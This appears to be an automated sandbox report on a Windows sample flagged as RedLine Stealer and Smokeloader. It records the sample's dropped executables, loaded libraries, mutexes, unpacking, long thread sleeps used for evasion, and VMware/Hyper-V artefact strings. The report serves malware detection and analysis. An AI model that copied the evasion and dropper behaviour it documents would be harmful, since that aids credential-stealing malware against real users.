Source: 00000000.00000002.4557098712.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.4557355971.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 8BB0.tmp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/7@11/5

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_004B07A6 CreateToolhelp32Snapshot,Module32First,

0_2_004B07A6

Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe

Code function: 2_2_004361E0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,

2_2_004361E0

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\track_prt[1].htm

Jump to behavior

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Mutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5064

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

File created: C:\Users\user\AppData\Local\Temp\8BB0.tmp

Jump to behavior

Source: DG55Gu1yGM.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DG55Gu1yGM.exe	Virustotal: Detection: 43%
Source: DG55Gu1yGM.exe	ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Users\user\Desktop\DG55Gu1yGM.exe "C:\Users\user\Desktop\DG55Gu1yGM.exe"
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Process created: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe "C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 1636
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Process created: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe "C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Unpacked PE file: 0.2.DG55Gu1yGM.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Unpacked PE file: 2.2.8BB0.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Unpacked PE file: 0.2.DG55Gu1yGM.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Unpacked PE file: 2.2.8BB0.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004B339D push 00000003h; ret	0_2_004B33A1
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004B15F2 push es; iretd	0_2_004B1603
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004B59AA pushad ; ret	0_2_004B59C6
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004B5B28 push ecx; ret	0_2_004B5B45
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004B2EFC pushad ; ret	0_2_004B2F24
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0215799F push esp; retf	0_2_021579A7
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_021309CD push ecx; ret	0_2_021309E0
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0213CE18 push ss; retf	0_2_0213CE1D
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02157F9D push esp; retf	0_2_02157F9E
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_0212FFF3 push ecx; ret	0_2_02130006
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02159DE8 pushad ; retf	0_2_02159DEF
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0041ACF6 push esp; iretd	2_2_0041ACFF
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043F6EE push esp; iretd	2_2_0043F6EF
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_0043BF00 push eax; mov dword ptr [esp], 49484716h	2_2_0043BF01
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_008DBCE5 pushad ; ret	2_2_008DBCEA
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_008DBF6B push ebp; ret	2_2_008DBF70
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024EC167 push eax; mov dword ptr [esp], 49484716h	2_2_024EC168
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024EF555 push esp; iretd	2_2_024EF556
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe	Code function: 2_2_024CAF5D push esp; iretd	2_2_024CAF66

Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.371051868429859
Source: 8BB0.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.371051868429859

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe			Jump to dropped file
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	File created: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe			Jump to dropped file

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Window / User API: threadDelayed 457			Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Window / User API: threadDelayed 9528			Jump to behavior

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-65409

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe

API coverage: 5.1 %

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe TID: 4612	Thread sleep count: 457 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe TID: 4612	Thread sleep time: -329954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe TID: 4612	Thread sleep count: 9528 > 30	Jump to behavior
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe TID: 4612	Thread sleep time: -6879216s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8BB0.tmp.exe TID: 2680	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_004389F2 FindFirstFileExW,		0_2_004389F2
Source: C:\Users\user\Desktop\DG55Gu1yGM.exe	Code function: 0_2_02158C59 FindFirstFileExW,		0_2_02158C59

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.0000000000591000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWo
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: 8BB0.tmp.exe, 00000002.00000002.2550620400.0000000000917000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: DG55Gu1yGM.exe, 00000000.00000002.4557144801.000000000054E000.00000004.00000020.00020000.00000000.sdmp, DG55Gu1yGM.exe, 00000000.00000002.4557144801.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000002.2550654344.000000000095B000.00000004.00000020.00020000.00000000.sdmp, 8BB0.tmp.exe, 00000002.00000003.2287094068.000000000095B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
